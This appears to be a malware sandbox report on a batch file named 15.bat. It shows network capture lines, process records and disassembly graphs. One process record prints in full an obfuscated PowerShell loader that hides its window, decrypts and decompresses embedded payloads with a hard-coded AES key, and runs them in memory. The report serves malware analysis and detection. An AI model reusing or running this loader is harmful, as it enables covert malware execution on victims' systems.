                  Apr 20, 2024 10:09:47.712292910 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:47.714272976 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:47.973675966 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:47.973855972 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:48.216449022 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:53.675286055 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:53.928735971 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:53.928927898 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:54.132782936 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:54.181977034 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:54.384277105 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:54.388019085 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:54.638042927 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:54.638366938 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:54.881268024 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:10:01.488622904 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:01.740128994 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:10:01.744214058 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:01.946973085 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:10:02.088129044 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:02.266036987 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:10:02.268217087 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:02.290721893 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:10:02.292213917 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:02.628458023 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:02.878638029 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:10:02.878731966 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:03.120935917 CEST444949730193.222.96.128192.168.2.4

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:10:05:55
                  Start date:20/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\15.bat" "
                  Imagebase:0x7ff61b9b0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:1
                  Start time:10:05:55
                  Start date:20/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:2
                  Start time:10:05:55
                  Start date:20/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\15.bat"
                  Imagebase:0x7ff61b9b0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:3
                  Start time:10:05:55
                  Start date:20/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:4
                  Start time:10:05:55
                  Start date:20/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
                  Imagebase:0x7ff61b9b0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:5
                  Start time:10:05:55
                  Start date:20/04/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Imagebase:0x7ff788560000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:6
                  Start time:10:05:58
                  Start date:20/04/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  Imagebase:0x7ff788560000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:1.5%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:8
                    Total number of Limit Nodes:1
                    execution_graph 13633 7ffd9b8a45ea 13634 7ffd9b8efc40 GetFileType 13633->13634 13636 7ffd9b8efcc4 13634->13636 13637 7ffd9b8ad4f9 13638 7ffd9b8ad50f 13637->13638 13639 7ffd9b8ad552 13638->13639 13640 7ffd9b8ad67d CreateFileW 13638->13640 13641 7ffd9b8ad6de 13640->13641

                    Executed Functions

                    Function 00007FFD9B8A6E30 Relevance: 2.1, Strings: 1, Instructions: 857COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 79 7ffd9b8a6e30-7ffd9b8ac73a 83 7ffd9b8ac73c-7ffd9b8ac74c 79->83 84 7ffd9b8ac74e-7ffd9b8ac75f 79->84 83->83 83->84 85 7ffd9b8ac770-7ffd9b8ac7a1 84->85 86 7ffd9b8ac761-7ffd9b8ac76f 84->86 90 7ffd9b8ac7f7-7ffd9b8ac7fe 85->90 91 7ffd9b8ac7a3-7ffd9b8ac7a9 85->91 86->85 93 7ffd9b8ac83f-7ffd9b8ac868 90->93 94 7ffd9b8ac800-7ffd9b8ac801 90->94 91->90 92 7ffd9b8ac7ab-7ffd9b8ac7ac 91->92 95 7ffd9b8ac7af-7ffd9b8ac7b2 92->95 96 7ffd9b8ac804-7ffd9b8ac807 94->96 98 7ffd9b8ac7b8-7ffd9b8ac7c8 95->98 99 7ffd9b8ac869-7ffd9b8ac932 95->99 96->99 100 7ffd9b8ac809-7ffd9b8ac81a 96->100 101 7ffd9b8ac7ca-7ffd9b8ac7ec 98->101 102 7ffd9b8ac7f0-7ffd9b8ac7f5 98->102 115 7ffd9b8ac93b-7ffd9b8ac93f 99->115 116 7ffd9b8ac934-7ffd9b8ac939 99->116 103 7ffd9b8ac836-7ffd9b8ac83d 100->103 104 7ffd9b8ac81c-7ffd9b8ac822 100->104 101->102 102->90 102->95 103->93 103->96 104->99 108 7ffd9b8ac824-7ffd9b8ac832 104->108 108->103 117 7ffd9b8ac942-7ffd9b8aca2c call 7ffd9b8a4620 115->117 116->117 131 7ffd9b8aca35-7ffd9b8aca39 117->131 132 7ffd9b8aca2e-7ffd9b8aca33 117->132 133 7ffd9b8aca3c-7ffd9b8aca87 131->133 132->133 137 7ffd9b8aca89-7ffd9b8aca8e 133->137 138 7ffd9b8aca90-7ffd9b8aca94 133->138 139 7ffd9b8aca97-7ffd9b8acb84 137->139 138->139 151 7ffd9b8acb8c-7ffd9b8acb93 139->151 152 7ffd9b8acb9a-7ffd9b8acbb6 151->152 154 7ffd9b8acbb8-7ffd9b8acbba 152->154 155 7ffd9b8acbbc-7ffd9b8acbd5 152->155 156 7ffd9b8acbd7-7ffd9b8acbe5 154->156 155->156 158 7ffd9b8acbeb-7ffd9b8acc1f 156->158 159 7ffd9b8acc72-7ffd9b8acc9e 156->159 174 7ffd9b8acc22-7ffd9b8acc5c call 7ffd9b8a7c18 158->174 160 7ffd9b8acd58-7ffd9b8acd98 159->160 161 7ffd9b8acca4-7ffd9b8acd51 call 7ffd9b8a7bc8 159->161 171 7ffd9b8ace89-7ffd9b8ace97 call 7ffd9b8acf2e 160->171 172 7ffd9b8acd9e-7ffd9b8acdac 160->172 161->160 185 7ffd9b8ace99-7ffd9b8acea7 171->185 186 7ffd9b8aceaa-7ffd9b8aceb5 171->186 175 7ffd9b8ace41-7ffd9b8ace6f 172->175 176 7ffd9b8acdb2-7ffd9b8acdbd 172->176 198 7ffd9b8acc5e-7ffd9b8acc62 174->198 199 7ffd9b8acc63-7ffd9b8acc65 174->199 187 7ffd9b8ace71-7ffd9b8ace81 175->187 188 7ffd9b8ace82-7ffd9b8ace86 175->188 185->186 191 7ffd9b8aceb7-7ffd9b8acefb call 7ffd9b8a2ed8 186->191 192 7ffd9b8acf0d-7ffd9b8acf2d 186->192 187->188 188->171 191->192 198->199 199->174 202 7ffd9b8acc67-7ffd9b8acc71 199->202 202->159
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: ZL_H
                    • API String ID: 0-3109080135
                    • Opcode ID: a66f5fb573f0c62edb0dfba7547fcc4e12b430291a7f86e998c0ad75d73ffc49
                    • Instruction ID: a6322e33baa8473d7afaa039702a7418d02bf71f318add641a2d0f7f9bbc417d
                    • Opcode Fuzzy Hash: a66f5fb573f0c62edb0dfba7547fcc4e12b430291a7f86e998c0ad75d73ffc49
                    • Instruction Fuzzy Hash: D8424831B19A4E4FEB9CDB2C88656B573D2FF99310F1441BAD05EC72E6DE35A8428780
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD9B8AD4F9 Relevance: 1.7, APIs: 1, Instructions: 245fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 280b12a183fb1455493e3992454f50d4f2cdb61e00ac646047d74180fcc740e1
                    • Instruction ID: 4e911cf3e1cc0829262934a45e4ac88145f219df0762167cfa894c79ff645eff
                    • Opcode Fuzzy Hash: 280b12a183fb1455493e3992454f50d4f2cdb61e00ac646047d74180fcc740e1
                    • Instruction Fuzzy Hash: 5E71F671A0DA484FDB58DF6CD8556A97BE0FF59320F0442BEE049D32A2DF24A8028781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD9B8A45DA Relevance: 1.6, APIs: 1, Instructions: 130fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 231 7ffd9b8a45da-7ffd9b8ad673 235 7ffd9b8ad675-7ffd9b8ad67a 231->235 236 7ffd9b8ad67d-7ffd9b8ad6dc CreateFileW 231->236 235->236 237 7ffd9b8ad6de 236->237 238 7ffd9b8ad6e4-7ffd9b8ad70c 236->238 237->238
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 70a6e182c92b496d68fc852dc464a6e39a20cdd66db62cea893af21cc4adbfc7
                    • Instruction ID: f4e427c6e80c2414a82e948a563d1b98d3f9fc36409eea0e101c92e79d5b4bc4
                    • Opcode Fuzzy Hash: 70a6e182c92b496d68fc852dc464a6e39a20cdd66db62cea893af21cc4adbfc7
                    • Instruction Fuzzy Hash: 7F31A27191CA1C8FDB58EF58D845AF977E0FB69721F10422EE04EE3251DB70A8028BC1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD9B8A45EA Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 240 7ffd9b8a45ea-7ffd9b8efcc2 GetFileType 244 7ffd9b8efcca-7ffd9b8efcef 240->244 245 7ffd9b8efcc4 240->245 245->244
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID: FileType
                    • String ID:
                    • API String ID: 3081899298-0
                    • Opcode ID: 9b5c70a5677a51f9417965b1ebe56ccf62e1c00a5684c3df1e35fcb8b3204905
                    • Instruction ID: 1e18795d65b83358bee11c003991a0802b2518befa5ea40affb0a9df091602a4
                    • Opcode Fuzzy Hash: 9b5c70a5677a51f9417965b1ebe56ccf62e1c00a5684c3df1e35fcb8b3204905
                    • Instruction Fuzzy Hash: EE21B530A08A0C9FDB5CEB98D845BF977E0FB59321F10422ED049D3651DB71A812CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD9B9715DD Relevance: .7, Instructions: 669COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 247 7ffd9b9715dd-7ffd9b9715e7 248 7ffd9b9715ee-7ffd9b9715ff 247->248 249 7ffd9b9715e9 247->249 251 7ffd9b971601 248->251 252 7ffd9b971606-7ffd9b971617 248->252 249->248 250 7ffd9b9715eb 249->250 250->248 251->252 253 7ffd9b971603 251->253 254 7ffd9b97161e-7ffd9b97162f 252->254 255 7ffd9b971619 252->255 253->252 256 7ffd9b971631 254->256 257 7ffd9b971636-7ffd9b971647 254->257 255->254 258 7ffd9b97161b 255->258 256->257 259 7ffd9b971633 256->259 260 7ffd9b97164e-7ffd9b9716b8 257->260 261 7ffd9b971649 257->261 258->254 259->257 264 7ffd9b9716ba-7ffd9b9716e4 260->264 265 7ffd9b9716e5-7ffd9b97170f 260->265 261->260 262 7ffd9b97164b 261->262 262->260 264->265 267 7ffd9b971715-7ffd9b97171f 265->267 268 7ffd9b971926-7ffd9b971984 265->268 269 7ffd9b971721-7ffd9b971739 267->269 270 7ffd9b97173b-7ffd9b971748 267->270 286 7ffd9b9719af-7ffd9b9719bb 268->286 287 7ffd9b971986-7ffd9b9719ad 268->287 269->270 276 7ffd9b97174e-7ffd9b971751 270->276 277 7ffd9b9718bb-7ffd9b9718c5 270->277 276->277 280 7ffd9b971757-7ffd9b97175f 276->280 281 7ffd9b9718c7-7ffd9b9718d7 277->281 282 7ffd9b9718d8-7ffd9b971923 277->282 280->268 284 7ffd9b971765-7ffd9b97176f 280->284 282->268 288 7ffd9b971771-7ffd9b97177f 284->288 289 7ffd9b971789-7ffd9b97178f 284->289 295 7ffd9b9719c6 286->295 287->286 288->289 294 7ffd9b971781-7ffd9b971787 288->294 289->277 293 7ffd9b971795-7ffd9b971798 289->293 296 7ffd9b9717e1 293->296 297 7ffd9b97179a-7ffd9b9717ad 293->297 294->289 303 7ffd9b9719c8-7ffd9b9719d7 295->303 298 7ffd9b9717e3-7ffd9b9717e5 296->298 297->268 307 7ffd9b9717b3-7ffd9b9717bd 297->307 298->277 301 7ffd9b9717eb-7ffd9b9717ee 298->301 308 7ffd9b9717f0-7ffd9b9717f9 301->308 309 7ffd9b971805-7ffd9b971809 301->309 305 7ffd9b9719e0-7ffd9b9719ef 303->305 306 7ffd9b9719d9 303->306 313 7ffd9b9719f1 305->313 314 7ffd9b9719f8-7ffd9b971a0b 305->314 306->305 311 7ffd9b9717bf-7ffd9b9717d4 307->311 312 7ffd9b9717d6-7ffd9b9717df 307->312 308->309 309->277 319 7ffd9b97180f-7ffd9b971815 309->319 311->312 312->298 313->314 314->303 318 7ffd9b971a0d-7ffd9b971a40 314->318 327 7ffd9b971a42-7ffd9b971a6b 318->327 328 7ffd9b971a6d-7ffd9b971a75 318->328 320 7ffd9b971831-7ffd9b971837 319->320 321 7ffd9b971817-7ffd9b971824 319->321 323 7ffd9b971853-7ffd9b971890 320->323 324 7ffd9b971839-7ffd9b971846 320->324 321->320 333 7ffd9b971826-7ffd9b97182f 321->333 356 7ffd9b971892-7ffd9b9718a7 323->356 357 7ffd9b9718a9-7ffd9b9718ba 323->357 324->323 336 7ffd9b971848-7ffd9b971851 324->336 327->328 330 7ffd9b971a77-7ffd9b971a87 328->330 331 7ffd9b971ae8-7ffd9b971af2 328->331 341 7ffd9b971a94-7ffd9b971aaa 330->341 342 7ffd9b971a89-7ffd9b971a92 330->342 339 7ffd9b971af4-7ffd9b971af9 331->339 340 7ffd9b971afc-7ffd9b971b41 331->340 333->320 336->323 343 7ffd9b971afa-7ffd9b971afb 339->343 341->343 352 7ffd9b971aac-7ffd9b971ae5 341->352 342->341 356->357
                    Memory Dump Source
                    • Source File: 00000006.00000002.1719618393.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ef2cfd1dcca4d46f89b9a86623f8607f510ac09824fd422f1f50168b7a7631f4
                    • Instruction ID: 985fbe2c436c24de8003bdf09ebf67ac928ffe8cf3d0d681535ff2dd665c9355
                    • Opcode Fuzzy Hash: ef2cfd1dcca4d46f89b9a86623f8607f510ac09824fd422f1f50168b7a7631f4
                    • Instruction Fuzzy Hash: 7B123921B1F7D92FE76A876858A15B47BE1EF52314B0A01FBD088C71F3EA189D068352
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00007FFD9B8AF50D Relevance: 3.0, Strings: 2, Instructions: 474COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 423 7ffd9b8af50d-7ffd9b8af54c 426 7ffd9b8af5a0-7ffd9b8af649 423->426 427 7ffd9b8af54e-7ffd9b8af59e 423->427 444 7ffd9b8af64b-7ffd9b8af697 426->444 445 7ffd9b8af699-7ffd9b8af73e 426->445 427->426 444->445 459 7ffd9b8af740-7ffd9b8af746 445->459 460 7ffd9b8af75d-7ffd9b8af75e 445->460 466 7ffd9b8af748-7ffd9b8af74e 459->466 467 7ffd9b8af764-7ffd9b8af766 459->467 461 7ffd9b8af779-7ffd9b8af77e 460->461 462 7ffd9b8af760-7ffd9b8af766 460->462 464 7ffd9b8af780-7ffd9b8af786 461->464 462->464 468 7ffd9b8af768-7ffd9b8d3e06 462->468 470 7ffd9b8af787-7ffd9b8af78d 464->470 475 7ffd9b8af76b-7ffd9b8af76e 466->475 476 7ffd9b8af750-7ffd9b8af756 466->476 467->464 467->468 474 7ffd9b8d3e08-7ffd9b8d3e0d 468->474 473 7ffd9b8af78e-7ffd9b8af849 470->473 511 7ffd9b8af897 473->511 512 7ffd9b8af84b-7ffd9b8af86e 473->512 478 7ffd9b8d3e47-7ffd9b8d3e51 call 7ffd9b8cda60 474->478 479 7ffd9b8d3e0f-7ffd9b8d3e12 474->479 475->470 477 7ffd9b8af770 475->477 485 7ffd9b8af758 476->485 486 7ffd9b8af772-7ffd9b8af776 476->486 477->486 492 7ffd9b8d3e53-7ffd9b8d3e5d call 7ffd9b8b37e0 478->492 493 7ffd9b8d3e5f-7ffd9b8d3e93 478->493 483 7ffd9b8d3e14-7ffd9b8d3e17 479->483 484 7ffd9b8d3e1e-7ffd9b8d3e29 call 7ffd9b8d0ba0 479->484 488 7ffd9b8d3e19 483->488 489 7ffd9b8d3e2b-7ffd9b8d3e45 483->489 484->474 485->460 486->473 495 7ffd9b8af778 486->495 496 7ffd9b8d3ea6-7ffd9b8d3ead 488->496 489->474 492->493 503 7ffd9b8d3e9e-7ffd9b8d3ea5 492->503 493->503 504 7ffd9b8d3e95-7ffd9b8d3e9d 493->504 495->461 503->496 513 7ffd9b8af899-7ffd9b8af8a9 511->513 514 7ffd9b8af881-7ffd9b8af896 511->514 518 7ffd9b8af875-7ffd9b8af877 512->518 514->511 519 7ffd9b8af879-7ffd9b8af87e 518->519 520 7ffd9b8af861-7ffd9b8af86e 518->520 519->514 520->518
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: NL_^$^
                    • API String ID: 0-2447703788
                    • Opcode ID: 8762004bd090f6621f36bba165033fa2e3ebea45b2d18b39a0a9917d20ce9dea
                    • Instruction ID: e6c0ca5d5b2ace2d1583755220e63352966ee37ed4cfad93ef22b2ae0f2f65dc
                    • Opcode Fuzzy Hash: 8762004bd090f6621f36bba165033fa2e3ebea45b2d18b39a0a9917d20ce9dea
                    • Instruction Fuzzy Hash: 5BD15652B0D9A64AD32AB3BD7C755FD7B40DF85338B0942BBC18D8B0E7A908644783D2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD9B8BDCA0 Relevance: 2.1, Strings: 1, Instructions: 840COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: _K_H
                    • API String ID: 0-2344692464
                    • Opcode ID: 3d729e8e9906ce062121ea85763f8872910ab35e953c4f844ab22203bbf3194f
                    • Instruction ID: 7e892242cd3ffa55faaa4b7ffd8d8b765e1e88e035a97ebf1a3187ed3c457d47
                    • Opcode Fuzzy Hash: 3d729e8e9906ce062121ea85763f8872910ab35e953c4f844ab22203bbf3194f
                    • Instruction Fuzzy Hash: 9142A431B1991E4FEBA4EB6CD864A6977E1FF9C340F0505B9E44DC32A6DE24E8418B81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFD9B8AF8D8 Relevance: 2.0, Strings: 1, Instructions: 751COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1718907892.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: eJ_^
                    • API String ID: 0-3379264260
                    • Opcode ID: 4b525855e0cd93730458f67a746bb80e6ea657ffe252c0b647dfe6a82e8810da
                    • Instruction ID: 3797be61c5196aa83672cc10b5945ac409a2a23135382a1a62aee510b62658ca
                    • Opcode Fuzzy Hash: 4b525855e0cd93730458f67a746bb80e6ea657ffe252c0b647dfe6a82e8810da
                    • Instruction Fuzzy Hash: A322F630B1DA4A4BE76CE768946267573C2FFD8740F45427EE04EC32D7DE29B9028681
                    Uniqueness

                    Uniqueness Score: -1.00%